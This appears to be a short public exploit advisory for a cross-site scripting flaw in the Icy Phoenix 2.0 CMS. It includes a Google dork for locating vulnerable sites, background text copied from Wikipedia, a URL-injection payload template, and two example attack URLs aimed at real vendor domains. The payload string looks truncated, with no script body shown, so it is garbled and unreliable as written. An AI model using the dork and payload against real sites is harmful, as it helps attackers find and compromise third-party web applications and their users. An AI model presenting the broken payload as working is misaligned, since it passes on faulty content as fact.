# Exploit Title: Icy Phoenix 2.0 CMS - Cross Site Scripting Vulnerability # Google Dork: intext:"Powered by Icy Phoenix based on phpBB" # Date: 25-09-2013 # Exploit Author: syst3m_f4ult # Vendor Homepage: http://www.icyphoenix.com # Software Link: http://www.icyphoenix.com/dload.php?action=file&file_id=178 # Version: 2.0 # Tested on: Ubuntu 12.04, Firefox [does not work on google chrome] *Icy Phoenix* is a CMS based onphpBB (an open-source Internet Forum package powered by PHP) plus many modifications and code integrations which add features to the whole package.Icy Phoenix has some features originally developed for phpBB XS Project which was founded by Bicet and then developed by both Bicet (who later started slimbb) and Mighty Gorgon (Luca Libralato). Icy Phoenix has been created by Mighty Gorgon after he left the phpBB XS Project. [taken from wikipedia] Exploit: http://[host]/?>"'>= Example: http://www.icyphoenix.com/?>"'>= http://www.icyphoenix.de/?>"'>=